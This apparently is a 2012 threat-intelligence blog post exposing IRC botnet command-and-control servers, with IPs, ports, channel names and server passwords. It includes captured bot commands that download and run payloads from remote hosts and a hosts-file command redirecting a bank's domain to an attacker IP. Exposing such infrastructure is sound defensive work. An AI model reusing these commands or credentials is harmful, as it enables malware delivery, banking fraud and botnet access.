Month: January 2012

93.95.99.87(irc botnet hosted in Russian Federation Moscow Jsc Mediasoft Ekspert)

Remote Host    Port Number
93.95.99.87    1866

NICK n[USA|XP|COMPUTERNAME]pxzflri
USER hh "" "lol" :hh

Now talking in #!h!
Modes On: [ #!h! ] [ +smntu ]
.load /99/106/112/81/55/59/40/110/116/35/105/120/111/108/117/108/110/38/127/122/100/56/126/9/22/45/45/35/61/47/45/56/47/117/104/83/104/119/126/71/120/46/102/126/105/

Hosting info: http://whois.domaintools.com/93.95.99.87

irc.r00t.me.uk(gBot hosted in Seychelles Ideal Solution Ltd)

Remote Host       Port Number
irc.r00t.me.uk    7007    PASS gBot

NICK n{USA|XP}eqqcbip
USER n{USA|XP}eqqcbip 0 0 :n{USA|XP}eqqcbip

I don't have the exe to find more info, so try to find the channels yourself. This botnet is from the same guy as here: http://www.exposedbotnets.com/2011/06/ircircattinfogbot-variant-hosted-in.html

Hosting info: http://whois.domaintools.com/193.107.16.113

60.190.223.42(irc botnet hosted in China Zhejiang Ninbo Lanzhong Network Ltd)

Remote Host      Port Number
199.15.234.7     80
70.38.98.236     80
70.38.98.237     80
60.190.223.42    5101    PASS hax0r

PRIVMSG #US! :[d="http://img102.herosh.com/2012/01/14/551459105.gif" s="65536 bytes"] Executed file "C:\Documents and Settings\UserName\Application Data\1.tmp" - Download retries: 0
PRIVMSG #US! :[d="http://img103.herosh.com/2012/01/14/594572320.gif" s="61440 bytes"] Executed file "C:\Documents and Settings\UserName\Application Data\2.tmp" - Download retries: 0
PRIVMSG #US! :[d="http://img103.herosh.com/2012/01/04/210592960.gif" s="27648 bytes"] Executed file "C:\Documents and Settings\UserName\Application Data\3.tmp"

union-foros.com(irc botnet hosted in Seychelles Ideal Solution Ltd)

Remote Host      Port Number
193.107.19.60    1863

NICK {XPUSA919273}
JOIN #per
PRIVMSG #per : 14,1. 15:: [HOST] adido Host: 3,1 echo 69.64.58.90 www.viabcp.com >> %windir%\system32\drivers\etc\hosts 3,1 echo 69.64.58.90 viabcp.com >> %windir%\system32\drivers\etc\hosts
USER COMPUTERNAME * 0 :COMPUTERNAME
MODE {XPUSA919273} -ix

Now talking in #per
Topic On: [ #per ] [ .host.add 69.64.58.90 www.viabcp.com|.host.add 69.64.58.90 viabcp.com ]
Topic

d.xludakx.com(ngrBot hosted in Netherlands Amsterdam Leaseweb B.v)

This NgrBotnet connects to 3 domains and is approximately 100k:

Resolved : [d.xludakx.com] To [95.211.165.62]
Resolved : [ab.0n3mmm.com] To [95.211.165.62]
Resolved : [ab.0n3mmm.com] To [178.33.143.52]
Resolved : [ab.0n3mmm.com] To [109.75.176.231]
Resolved : [pusikuracbre.com] To [95.211.165.62]

Remote Host       Port Number
199.15.234.7      80
95.211.165.62     4949    PASS ngrBot
109.75.176.231    4949    PASS ngrBot
178.33.143.52     4949    PASS ngrBot
ab.0n3mmm.com +666

80.79.112.66(ngrBot hosted in Estonia Tallinn Aktsiaselts Wavecom)

Remote Host       Port Number
109.68.190.217    80
199.15.234.7      80
80.79.112.66      5749    PASS axplm2

NICK n{US|XPa}psbmdzo
USER psbmdzo 0 0 :psbmdzo
JOIN #chat Amx4k
PRIVMSG win7elite :[d="http://109.68.190.217/alms22.exe" s="150528 bytes"] Updated bot file "C:\Documents and Settings\UserName\Application Data\Scxaxs.exe" - Download retries: 0

Hosting info: http://whois.domaintools.com/80.79.112.66

Virus.Win32.Nimnul.a(Malware hosted in United States Network Operations Center Inc)

Hosted in the USA; also called Ramnit by other antiviruses. What this malware does: Capability to send out email message(s) with the built-in SMTP client engine. Produces outbound traffic. Communication with a remote SMTP server and sending out email. Downloads/requests other files from the Internet. Compromises SafeBoot registry key(s) in an attempt to disable Safe Mode.